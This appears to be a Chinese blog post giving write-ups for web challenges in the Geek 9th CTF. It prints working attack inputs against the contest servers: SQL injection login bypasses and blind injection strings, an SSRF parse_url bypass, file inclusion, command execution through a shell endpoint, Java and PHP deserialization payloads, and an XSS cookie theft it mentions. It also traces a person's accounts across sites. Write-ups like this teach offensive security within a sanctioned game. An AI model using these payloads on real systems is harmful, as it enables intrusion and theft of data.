<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>Geek 9th Writeup - P1g3</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content="P1g3">
  
  
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.02">
  
  
    <link rel="alternate" href="/atom.xml " title="P1g3" type="application/atom+xml">
  

  <link rel="stylesheet" href="/css/style.css">
</head></html>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">P1g3</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/archives" class="menu-item-link">Archives</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
        <li class="menu-item">
          <a href="/friends" class="menu-item-link">Friends</a>
        </li>
      
    </ul>
  </nav>
</header>
<article class="post">
  <div class="post-title">
    <h1 class="article-title">Geek 9th Writeup</h1>
  </div>
   <div class="post-meta">
    <span class="post-time">2018-11-18</span>
  </div>
  <div class="post-content">
    <h2 id="test"><a href="#test" class="headerlink" title="test"></a><strong>test</strong></h2><p><strong>Welcome:签到题，直接给了flag。</strong></p>
<p>flag:SYC{welc0me_to_g33k_have_f1n!}</p>
<p><strong>凑分题233333：这是因为WEB的一道题被非预期之后修改代码重新出的一道题。</strong></p>
<p>代码如下：</p>
<pre><code>&lt;?php 

function check_inner_ip($url) 
{ 
    $match_result=preg_match(&apos;/^(http|https)?:\/\/.*(\/)?.*$/&apos;,$url); 
    if (!$match_result) 
    { 
        die(&apos;url fomat error1&apos;); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die(&apos;url fomat error2&apos;); 
    } 
    $hostname=$url_parse[&apos;host&apos;]; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long(&apos;127.0.0.0&apos;)&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long(&apos;10.0.0.0&apos;)&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long(&apos;172.16.0.0&apos;)&gt;&gt;20 == $int_ip&gt;&gt;20 || ip2long(&apos;192.168.0.0&apos;)&gt;&gt;16 == $int_ip&gt;&gt;16 || ip2long(&apos;0.0.0.0&apos;)&gt;&gt;24 == $int_ip&gt;&gt;24;
} 

function safe_request_url($url) 
{ 

    if (check_inner_ip($url)) 
    { 
        echo $url.&apos; is inner ip&apos;; 
    } 
    else 
    { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info[&apos;redirect_url&apos;]) 
        { 
            safe_request_url($result_info[&apos;redirect_url&apos;]); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 

} 

$url = $_POST[&apos;url&apos;]; 
if(!empty($url)){ 
    safe_request_url($url); 
} 
else{ 
    highlight_file(__file__); 
} 

//hint23333: 
//flag in flag.php 
//phpinfo in phpinfo.php 

?&gt;
</code></pre><p>一个SSRF，但是限制了IP和协议，用DNS重绑定即可绕过，这里有时候会显示is inner ip，因为ip是随机的，多访问几次就好了。</p>
<p><img src="http://static.zybuluo.com/Em1or/03i78rqewo3g9m27xoon2ozs/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-73.9kB"></p>
<p>flag:SYC{t3st_0nly_9}</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a><strong>WEB</strong></h2><p><strong>2000字的检讨</strong></p>
<p><img src="http://static.zybuluo.com/Em1or/smzm8oogbw9sjdf5b1mumaxj/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-714.8kB"></p>
<p>网页禁止了直接查看源码，我们可以Ctrl+U用快捷键看源码，提交了检讨后flag就出来了。</p>
<p><img src="http://static.zybuluo.com/Em1or/vryfusvdigs1yurjmbh63y09/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-22.9kB"></p>
<p> flag:SYC{evoA_Y0ur_JusT_3Scap3_Th3_Jav4scr1pt_l1m1T}</p>
<p> <strong>幸运大挑战</strong></p>
<p> 题目要求我们点一个按钮，要求数字点到10。</p>
<p> <img src="http://static.zybuluo.com/Em1or/grsy43wsh7ooqu0zhsk6zcyg/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-54.7kB"></p>
<p> 观察URL：<a href="http://wholuck.game.sycsec.com/form?score=1.68" target="_blank" rel="noopener">http://wholuck.game.sycsec.com/form?score=1.68</a>,score后跟着秒数，于是我们直接将score的秒数改成10.00就好啦。</p>
<p><img src="http://static.zybuluo.com/Em1or/nazjx5r63r2raesy33qy4owk/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-95.8kB"></p>
<p>flag:SYC{evoA_U_are_V3ry_FanTaStic_2_G3t_l0!}</p>
<p><strong>代号为geek的行动第二幕：废弃的地下黑客论坛</strong></p>
<p><img src="http://static.zybuluo.com/Em1or/mi1txuepjp8gvfjdhiapf1kr/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-1038kB"></p>
<p>打开页面一看，是个后台登陆界面框，随便输了账号密码，下面跳出查询语句，猜测为万能密码，网上找了个php万能密码，’ OR ‘1’=’1，登陆之，得到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/mf3t3ved6uo0otmi3oxzcu8h/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-1020.1kB"></p>
<p>flag:SYC{h4ck-by-l0c4l6uy-23333333333}</p>
<p><strong>geek番外篇之废弃的地下黑客论坛</strong></p>
<p>这道题和上边那道题一样思路，只不过对长度有了要求，不能超过四个字符，于是换了个短点的万能密码,user:\ pass:||1#，即可得到flag。</p>
<p> flag:SYC{yun-we1-ya0-be1-gu0}</p>
<p> <strong>初来乍到</strong></p>
<p> 给了hint：HTML源码中藏着秘密，打开网页之后查看源码，从源码中得到flag。</p>
<p> flag:SYC{View_Page_Source_to_Get_Flag}</p>
<p> <strong>代号为geek的行动第三幕：暗网追击</strong></p>
<blockquote>
<p> 废弃的后台已经没有当年的论坛人员信息，只有管理员的最后留下的一则公告:Brothers, the forum moved to the<br>dark network xxxxxxxx.onion the new name is HumanSkeleton, where we<br>will meet again.“穿山甲”顺藤摸瓜的找到了入口，可是权限好像有点问题？</p>
</blockquote>
<p>打开链接后看到一张图：</p>
<p><img src="http://static.zybuluo.com/Em1or/bxg9wd8nazj4oi18hjtif4hv/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-145kB"></p>
<p>根据图片内容以及hint猜测是权限不对，burp抓包。</p>
<p><img src="http://static.zybuluo.com/Em1or/qe6cqohey18g3l26uqp7szm8/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-71.3kB"></p>
<p>将is_admin的值改为1即可获取flag的图片地址。</p>
<p><img src="http://static.zybuluo.com/Em1or/ldsae752caw2udjdoajg5xs9/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-157.9kB"></p>
<p>flag:SYC{w3lc0m3-4dm1n}</p>
<p><strong>一起来和php撸猫啊</strong></p>
<blockquote>
<p>三中心的肥猫好可爱呀，php先生每次路过时都忍不住要撸一把猫才走，被撸到脱“发”的肥猫对php先生很是恐惧。你可以通过得到隐藏flag的方式来抑制php先生的这种强烈撸猫欲吗？</p>
</blockquote>
<p>打开后是一只猫转来转去的画面，通过hint，我们查看源码，找到关键代码。</p>
<pre><code>if (isset($_GET[&apos;p1&apos;])){

    if ($_GET[&apos;p1&apos;] &gt; 99999999 &amp;&amp; strlen($_GET[&apos;p1&apos;]) &lt; 9){

        if (isset ( $_GET [&apos;p2&apos;] )) {
                $p2 = $_GET [&apos;p2&apos;];
                if (is_numeric($p2)){
                    die(&apos;Input cannot be a number!!!&apos;);
                }
                else{
                    switch ($p2) {
                        case 0 :
                            break;    
                        case 1 :
                            break;
                        case 2 :
                            echo &quot;flag{xxxxx}&quot;;
                            break;
                        default :
                            echo &quot;2333333&quot;;
                            break;
                    }
                }

            }
    }

}
</code></pre><p>考察科学记数法。判断条件为True的条件为：大于99999999 但是长度小于9。<br>这里可用9e999绕过，进入第二个条件，判断p2是否为数字，如果是数字，则不再继续执行，否则继续执行switch语句，这里我之前试了一下Two绕不了，试了一下2xxx即可绕过，即在数字后门加英文字母。</p>
<p><img src="http://static.zybuluo.com/Em1or/ipam6gtq2kv3shvl0hboqz8i/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-26.3kB"></p>
<p>flag:SYC{pHP_1s_th3_most_p0werfu11}</p>
<p><strong>代号为geek的行动第四幕：绝密情报</strong></p>
<blockquote>
<p>绕过了权限之后，“穿山甲”开始了对网站的快速渗透测试，一分钟后他好像找到可以读取情报的漏洞点。 ps:正则失效，出题已祭天</p>
</blockquote>
<pre><code>&lt;?php 
error_reporting(0); 
if (!empty($_GET)||!empty($_POST)){ 
    if(preg_match(&quot;syclover&quot;,$_GET[&apos;id&apos;])) { 
          echo(&quot;&lt;p&gt;you&apos;re a gay, not allowed !&lt;/p&gt;&quot;); 
          exit(); 
    } 

    $_GET[&apos;id&apos;] = urldecode($_GET[&apos;id&apos;]); 

    if($_GET[&apos;id&apos;] == &quot;syclover&quot;) 
    { 
          echo &quot;&lt;p&gt;Wow~ ,You&apos;re smart, Access granted!&lt;/p&gt;&quot;; 

          $f = $_POST[file]; 
          $str = $f.&quot;.php&quot;; 
        @require $str;  
    } 
    else 
    { 
          @require(&apos;showpass.php&apos;); 
    } 

}  
else { 
    highlight_file(&quot;index.php&quot;); 
} 

?&gt;
</code></pre><p>根据hint和代码判断，是一个简单的文件包含，没有任何过滤，原有的正则也失效了，导致第一个判断条件可以直接忽略，直接读文件即可。</p>
<p><img src="http://static.zybuluo.com/Em1or/7p69q0l6z1ols12vfw2qjpa8/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-94.6kB"></p>
<p>将得到的源码base64解密一下,得到源码：</p>
<pre><code>&lt;?php
if(false){
    echo &quot;Play ¡á next game together£¡You win the current game,give you flag!&quot;;//SYC{LF1_S0_E@sy_I_L0ve_Sec}
}
else{
    echo &quot;I&apos;m here£¬but you can&apos;t find me~~&quot;;
}
?&gt;
</code></pre><p>flag:SYC{LF1_S0_E@sy_I_L0ve_Sec}</p>
<p><strong>江江师傅的秘密</strong></p>
<blockquote>
<p>江江师傅天天晚上都偷偷在实验室看视频,上次看到他晚上偷偷打开了C盘根目录下的study.txt文件，听说这几天他用自己电脑写了个三叶草代理平台，你能找到他C盘下的study.txt藏了什么吗?</p>
</blockquote>
<p>打开题目链接，看到网页猜测为SSRF，于是试了一下，果然，直接跳转到了我们的链接去。</p>
<p><img src="http://static.zybuluo.com/Em1or/kdh62skdrz8895lpj551ascc/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-59.2kB"></p>
<p>根据hint读取C盘下的study.txt文件，得到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/17mh2ni3p9h4uo22huvfrcsp/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-74.6kB"></p>
<p>flag:SYC{evoA_W0W_Y0u_k0nW_th3_file_Pr0t0c0l}</p>
<p><strong>番外*江江师傅的秘密</strong></p>
<pre><code>&lt;?php 
//error_reporting(E_ALL); 
function check_inner_ip($url) 
{ 
    $match_result=preg_match(&apos;/^(http|https)?:\/\/.*(\/)?.*$/&apos;,$url); 
    if (!$match_result) 
    { 
        die(&apos;url fomat error&apos;); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        dir(&apos;url fomat error&apos;); 
        return false; 
    } 
    $hostname=$url_parse[&apos;host&apos;]; 

    //var_dump($hostname); 

    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long(&apos;127.0.0.0&apos;)&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long(&apos;10.0.0.0&apos;)&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long(&apos;172.16.0.0&apos;)&gt;&gt;20 == $int_ip&gt;&gt;20 || ip2long(&apos;192.168.0.0&apos;)&gt;&gt;16 == $int_ip&gt;&gt;16; 
} 

function safe_request_url($url) 
{ 

    if (check_inner_ip($url)) 
    { 
        echo $url.&apos; is inner ip&apos;; 
    } 
    else 
    { 
        //var_dump($url); 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info[&apos;redirect_url&apos;]) 
        { 
            safe_request_url($result_info[&apos;redirect_url&apos;]); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 

} 

$url = $_POST[&apos;url&apos;]; 
if(!empty($url)){ 
    safe_request_url($url); 
} 
else{ 
    highlight_file(__file__); 
} 

//hint23333: 
//flag in flag.php 
//phpinfo in phpinfo.php 

?&gt;
</code></pre><p>这道题我一开始懵了，因为对SSRF没有研究过他的绕过姿势，后来发现有个地方代码写错了，导致原有的过滤机制无效，算是一种非预期的做法，这里我们直接绕过url_parse函数，使这个函数返回false，就可以跳过ip验证，但是要保证在绕过函数的同时访问本地资源。(PS:这道题验证了ip以及协议)</p>
<p>构造exp：url=<a href="http://127.0.0.1:80aaaa/flag.php" target="_blank" rel="noopener">http://127.0.0.1:80aaaa/flag.php</a></p>
<p><img src="http://static.zybuluo.com/Em1or/8ier7oghjvphzinslss9889g/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-75.1kB"></p>
<p>flag:SYC{ORZ_ORANGE_dalao}</p>
<p><strong>代号为geek的行动终章：落命</strong></p>
<blockquote>
<p>镜像被快速地破解，里面找到了qq779938689的聊天记录，不过只有只言片语，重要的部分似乎已经被粉碎了。 ps:没有链接的web题</p>
</blockquote>
<p>这道题有点坑…明明和镜像没关系，硬是扯到了镜像，我还以为我漏了什么东西没有恢复，后面才知道这是一个社工题。</p>
<p>百度搜索：779938689 无果，只得到一个贴吧用户链接：<a href="http://tieba.baidu.com/home/main?un=lzayixxe&amp;ie=utf-8&amp;fr=pb&amp;red_tag=h0182034824" target="_blank" rel="noopener">http://tieba.baidu.com/home/main?un=lzayixxe&amp;ie=utf-8&amp;fr=pb&amp;red_tag=h0182034824</a></p>
<p>从这里得到了用户名：lzayixxe，去知乎搜索这个用户名，找到一个用户：<a href="https://www.zhihu.com/people/lzayixxe/answers" target="_blank" rel="noopener">https://www.zhihu.com/people/lzayixxe/answers</a></p>
<p><img src="http://static.zybuluo.com/Em1or/tvc16kcwnez3870ejus8eet8/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-45.9kB"></p>
<p>从他的回答中发现，他使用过github，于是在github中搜索这个用户名，找到一个用户：<a href="https://github.com/Lazyboxx" target="_blank" rel="noopener">https://github.com/Lazyboxx</a></p>
<p>发现他有个项目是当天修改了的，进入项目，原本的项目没包含flag，看了一下历史项目，于是就getflag了。</p>
<p><img src="http://static.zybuluo.com/Em1or/0ogeycf9hlpvp0ie7bbyuoo0/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-76.3kB"></p>
<p>flag:syc{this_is_real_flag_and_do_not_connect_mysql}</p>
<p><strong>柠檬师傅日站的秘籍</strong></p>
<blockquote>
<p>一天大柠檬问兔子：你日站看js吗？</p>
</blockquote>
<p>根据hint，打开题目链接，发现加载了一个js：<a href="https://geek.l0ca1.xyz/js/main.js" target="_blank" rel="noopener">https://geek.l0ca1.xyz/js/main.js</a></p>
<pre><code>var p = document.getElementById(&quot;result&quot;);
fetch(&quot;/sycshell?cmd=echo &apos;9th geek&apos;&quot;).then(res=&gt;{
    return res.json();
}).then(json=&gt;{
    var html = &quot;&quot;;
    json.body.forEach((ele) =&gt; {
        html += ele.replace(&quot;\r&quot;,&quot;&quot;);
    });
    p.innerHTML = html;
}).catch(err=&gt;{
    p.innerHTML = &quot;SYCL0veR&quot;;
});
</code></pre><p>js本身没有什么价值，利用点在fetch的url，从代码上看是一个代码执行，执行ls看看。</p>
<p><img src="http://static.zybuluo.com/Em1or/ctds5758bbz1ho82bh0gt9jr/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-52kB"></p>
<p>果然，执行ls -R，查看所有目录下的子目录及文件。</p>
<p><img src="http://static.zybuluo.com/Em1or/6k0rfhkyotuo36fwjkjnca4g/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-76.8kB"></p>
<p>可以看到存flag的目录：./geek/flag_is_here，我们直接cat来查看文件内容。</p>
<p><img src="http://static.zybuluo.com/Em1or/fzpy547gqgj8nnizzids6fny/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-47.7kB"></p>
<p>flag:SYC{syCl0ver_sheL1}</p>
<p><strong>ratten师傅去哪了</strong></p>
<blockquote>
<p>我已经一个多星期没见到过ratten师傅了，上次见他他跟我说他日了一个网站，从那以后他就失踪了，他之前做了一个写日记的网站，ratten师傅可能把他的信息放在了那，你能找到ratten师傅去哪了吗。</p>
</blockquote>
<p>题目链接：<a href="http://ratten-secret.game.sycsec.com/" target="_blank" rel="noopener">http://ratten-secret.game.sycsec.com/</a></p>
<p>打开了之后可以看到是一个普通的登陆界面，测试发现无sql注入，随便注册一个账号，登陆进去之后，发现有留言框。</p>
<p><img src="http://static.zybuluo.com/Em1or/ielm9bljhpsby3d5zxjp7c3d/%E4%B8%AD%E7%A7%91%E9%99%A2.png" alt="中科院.png-22.3kB"></p>
<p>一开始以为是xss，但是发现代码被实体化了，所以就另找出路了。绑定这里有个绑定邮箱，发现不需要注册码，随便注册什么邮箱只要没绑定过都显示注册成功，感觉有端倪，就抓了个包。</p>
<p><img src="http://static.zybuluo.com/Em1or/pb1stxnpytm9eqr4lkb4u8ms/%E4%B8%AD%E7%A7%91%E9%99%A2.png" alt="中科院.png-71kB"></p>
<p>发现有个uid，经过测试发现uid可以修改为任意值，猜测管理员的uid为1，修改之后提交包显示修改成功。（PS：这里被坑了很久，很早就发现修改任意用户绑定邮箱这个点，但是没有想到修改邮箱了之后密码用自己之前设置的也可以登 - -）</p>
<p>改好了之后用邮箱+自己的密码即可登陆管理员账户。</p>
<p><img src="http://static.zybuluo.com/Em1or/h721pv4ob3j6yemoklqmygkn/%E4%B8%AD%E7%A7%91%E9%99%A2.png" alt="中科院.png-34.4kB"></p>
<p>flag:SYC{evoA_L0gIc_qU3st1on_Wec0m3_2_We8_w0r1d}</p>
<p><strong>怎么又是江师傅的秘密</strong></p>
<blockquote>
<p>晚上实验室突然断电了，江江师傅在断电前一秒下完了某个神秘文件，但是他忘记文件保存在哪里了，你能帮忙找回来吗？<br>源码：<a href="https://pan.baidu.com/s/1nqsXDZ2i8RwIxDVTJNTKWA" target="_blank" rel="noopener">https://pan.baidu.com/s/1nqsXDZ2i8RwIxDVTJNTKWA</a> 提取码: dqeb</p>
</blockquote>
<p>题目链接是一个上传页面。</p>
<p><img src="http://static.zybuluo.com/Em1or/mb4mgrl5tkchsb7nyrlcp4ca/%E4%B8%AD%E7%A7%91%E9%99%A2.png" alt="中科院.png-54kB"></p>
<p>这是主页的源码：</p>
<pre><code>&lt;%@ page contentType=&quot;text/html;charset=UTF-8&quot; %&gt;
&lt;!DOCTYPE html&gt;
&lt;html&gt;

&lt;%@include file=&quot;header.jsp&quot; %&gt;

&lt;body&gt;
&lt;div id=&quot;header&quot;&gt;
    &lt;span&gt;极客大挑战&lt;/span&gt;

    &lt;span&gt;江江师傅的秘密 · 第二弹&lt;/span&gt;
&lt;/div&gt;

&lt;div id=&quot;main&quot;&gt;
    &lt;h2&gt;晚上实验室突然断电了，&lt;br/&gt;
        江江师傅在断电前一秒下完了某个神秘文件，&lt;br/&gt;
        但是他忘记文件保存在哪里了，&lt;br/&gt;
        你能帮忙找回来吗？&lt;br/&gt;&lt;/h2&gt;
    &lt;form id=&quot;form&quot;
          action=&quot;&lt;%=request.getContextPath()%&gt;/upload.do&quot;
          enctype=&quot;multipart/form-data&quot;
          method=&quot;post&quot;
    &gt;
        &lt;input type=&quot;file&quot; name=&quot;torrent_file&quot;&gt;

        &lt;input type=&quot;submit&quot; value=&quot;上传&quot;&gt;
    &lt;/form&gt;
&lt;/div&gt;
&lt;/body&gt;
</code></pre><p></p>
<p><img src="http://static.zybuluo.com/Em1or/4kezmlvlp7puf7oebyefw0za/%E4%B8%AD%E7%A7%91%E9%99%A2.png" alt="中科院.png-130.4kB"></p>
<p><img src="http://static.zybuluo.com/Em1or/vfovf3f6ulz7k070q4prp915/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-136.4kB"></p>
<p>这两处是和上传相关的源码，从源码中可以看到考点应该是序列化与反序列化的知识。</p>
<pre><code>    if (&quot;/jiangjiang/secret/flag.avi&quot;.equals(this.moviePath)) {
        try (
                BufferedReader bufferedReader = new BufferedReader(new FileReader(this.moviePath))
        ) {
            this.movieContent = bufferedReader.readLine();
        }
    }
}
</code></pre><p>从判断条件得知，如果moviepath的值和前面的字符串相等，就执行以下的语句，这里我们需要自己构造一下序列化moviepath并把序列化好了的数据储存下来，然后上传给服务器，交由服务器反序列化并满足判断条件。</p>
<pre><code>package cn.edu.cuit.syclover.geek.model;


import cn.edu.cuit.syclover.geek.model.TorrentFile;

import java.io.*;
import java.util.ArrayList;
import java.util.List;

public class Test {
    public static void main(String[] args) {
        try {
            FileOutputStream  in=new FileOutputStream(new File(&quot;d:\\flag.txt&quot;));
            ObjectOutputStream  os = new ObjectOutputStream(in);
            TorrentFile torrentFile=new TorrentFile();
            torrentFile.setMoviePath(&quot;/jiangjiang/secret/flag.avi&quot;);
            os.writeObject(torrentFile);
            os.close();
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}
</code></pre><p>得到序列化好的数据包：</p>
<p><img src="http://static.zybuluo.com/Em1or/8jwjkk45hqbjvjqwtm2utz2q/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-20.8kB"></p>
<p>上传后得到flag：</p>
<p><img src="http://static.zybuluo.com/Em1or/fgzxdtbd2zuremq6ijzcochl/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-96.2kB"></p>
<p>flag:SYC{JiangJiang_S_Torrent_IS_Interesting}</p>
<p><strong>百万前端跑路了</strong></p>
<blockquote>
<p>SYC百万前端跑路了，我们没有没有没有没有办法，拿出flag抵工资，原价一百多两百多的flag，现在通通通通不要钱，快给admin留言申请吧，记得申请之前提交验证数字哦<br>主链接:<a href="http://easyxss.game.sycsec.com/" target="_blank" rel="noopener">http://easyxss.game.sycsec.com/</a> 备用链接：<a href="http://pipi.game.sycsec.com" target="_blank" rel="noopener">http://pipi.game.sycsec.com</a></p>
</blockquote>
<p><img src="http://static.zybuluo.com/Em1or/9bs0ydmsoae4wtcrtn2grna7/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-58.7kB"></p>
<pre><code>substr(md5(?), 0, 6) = f2f540
</code></pre><p>一开始不知道考的是什么，百度了一下才知道考的是md5截断的相关知识，这里直接用工具来跑密码值，大概三十秒就出来了。</p>
<p><img src="http://static.zybuluo.com/Em1or/xpfergwf08rrlew2gfp6w3g0/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-88.3kB"></p>
<p>因为前台看不到是否过滤，所以我随便丢了个exp上去，后面群里发公告说无过滤，但是我没打到cookie，直到出了备用链接才打到…（PS：由于出题环境有问题，所以第一个链接打不到cookie）</p>
<p><img src="http://static.zybuluo.com/Em1or/9wkqb7mbal5rhoh0at859hc8/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-91.6kB"></p>
<p>这里我又踩了一个坑…我打开页面后提示:403: Who are you? only 127.0.0.1 can find me.</p>
<p>我以为要考察伪造IP的知识，我就各种伪造，都进不去，后门才发现flag就在cookie里。</p>
<p>base64解密之后即可得到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/575ixnowmlhw4dd6pxg9n8f5/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-22.9kB"></p>
<p>flag:SYC{N0w_Y0u_know_How_7o_XSS_Cooki3}</p>
<p><strong>隐藏在混乱之中的绝密情报</strong></p>
<blockquote>
<p>穿山甲对“毒雾”黑客组织进行反渗透的时候，无意间进入到了该组织的医院。穿山甲发现医院里充斥着一种怪病，被这种病感染上的人都会不断的进行复读，细心的穿山甲发现，虽然病人复读的内容看起来杂乱无章，仔细一看其实是一种“序列化”的内容，穿山甲怀疑这就是“毒雾”隐藏绝密情报的一种方法</p>
</blockquote>
<p>题目链接：<a href="http://extra-intelligence.game.sycsec.com/" target="_blank" rel="noopener">http://extra-intelligence.game.sycsec.com/</a></p>
<p>根据提示：我发现其实复读机本质就是robots呢！</p>
<p>打开链接：<a href="http://extra-intelligence.game.sycsec.com/robots.txt" target="_blank" rel="noopener">http://extra-intelligence.game.sycsec.com/robots.txt</a></p>
<blockquote>
<p>If you see a garbled code, please change the encoding mode of the<br>browser.(please using baidu translate or google translate)</p>
<p>cl0und：你们两个各说一句话证明自己是humans Daedalus：我有我爱的人，我很爱他，我不想离♂开他<br>Mang0：你们两个各说一句话证明自己是humans</p>
<p>ps.这个东西叫做robots.txt<br>pss.改变下名字试试？<br>psss.humans的本质是?</p>
</blockquote>
<p>打开：<a href="http://extra-intelligence.game.sycsec.com/humans.txt" target="_blank" rel="noopener">http://extra-intelligence.game.sycsec.com/humans.txt</a></p>
<pre><code>If you see a garbled code, please change the encoding mode of the browser.(please using baidu translate or google translate)

这跟我是个冷酷无情的复读机有什么关系吗

我最近在复读的同时看到了一份源码，好像是叫www.zip这种东西

&lt;?php
class Daedalus{
    function __construct($test)  //该函数需要一个$test的参数
    {
       getflag();                //执行的操作是getflag
    }
}
class Mang0{
    var $message=&quot;hello_new_geek&quot;;        //定义message变量的值为hello_new_geek
    function __wakeup()
    {
        $newgay = new Daedalus($this-&gt;message); //创建时调用_construct的魔术方法
    }
}


$message = $_GET[&apos;message&apos;];

@$unser_message = unserialize($message); 


?&gt;
</code></pre><p>下载之后得到源码，可以看到考的是反序列化的知识，我们直接new一个关于Mang0的对象，并将其反序列化后的结果打印出来。</p>
<pre><code>$a = new Mang0();

echo serialize($a);

结果：O:5:&quot;Mang0&quot;:1:{s:7:&quot;message&quot;;s:14:&quot;hello_new_geek&quot;;}

输入之后得到flag。
</code></pre><p><img src="http://static.zybuluo.com/Em1or/9sg8sazqlm5eerlrt9ooydf9/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-7.9kB"></p>
<pre><code>flag：SYC{P0p_cha1n_CAn_Cr055_th3_clAsS}
</code></pre><p><strong>Geek Chatroom</strong></p>
<blockquote>
<p>极客官方复读机</p>
</blockquote>
<p><a href="http://daedalus.kim:9000/" target="_blank" rel="noopener">http://daedalus.kim:9000/</a></p>
<p>一开始以为是XSS，各种X未果，又想到如果是XSS这样公然暴露在聊天框中拿flag也就没有意义了，又看到一个hint：<strong>flag is all lowercase</strong>，还以为是脑洞题，又各种找目录文件，最后才知道原来是sql…</p>
<p>这里的sql花了一个上午和一个下午的时间才做出来，可能这就是菜鸡和大佬的差距吧…</p>
<p>在搜索框处抓包：</p>
<pre><code>POST /index.php?act=search HTTP/1.1
Host: daedalus.kim:9000
Content-Length: 24
Cache-Control: max-age=0
Origin: http://daedalus.kim:9000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://daedalus.kim:9000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

keyword=dd&amp;submit=Search
</code></pre><p>推测keyword存在注入，根据返回结果<strong>上车 SDDE-398</strong>，可发现keyword并不是只有在开头或者是在结尾才被匹配，推测其sql语句：<code>select * from tablename where keyword LIKE &#39;%dd%&#39;</code>，验证一下我们的想法。</p>
<p>先将闭合语句，再构造新的注入语句:<code>keyword=dd%&#39;#</code>，这里我们是先闭合了前面的语句，再注释掉后面的百分号。</p>
<p>发现返回内容和原来一至，存在注入，后续测试过程中发现过滤了UNION和空格，于是开始盲注，空格使用注释符绕过。</p>
<pre><code>keyword=dd%&apos;and/*asd*/LPAD((select/*asd*/schema_name/*asd*/from/*asd*/information_schema.schemata/*asd*/limit/*asd*/0,1),1,1)&gt;&apos;a&apos;#
</code></pre><p>这是一个判断语句，当左边的条件和右边的条件都成立时，则返回数据。</p>
<p>我们用a-z可以来判断出数据库的name。</p>
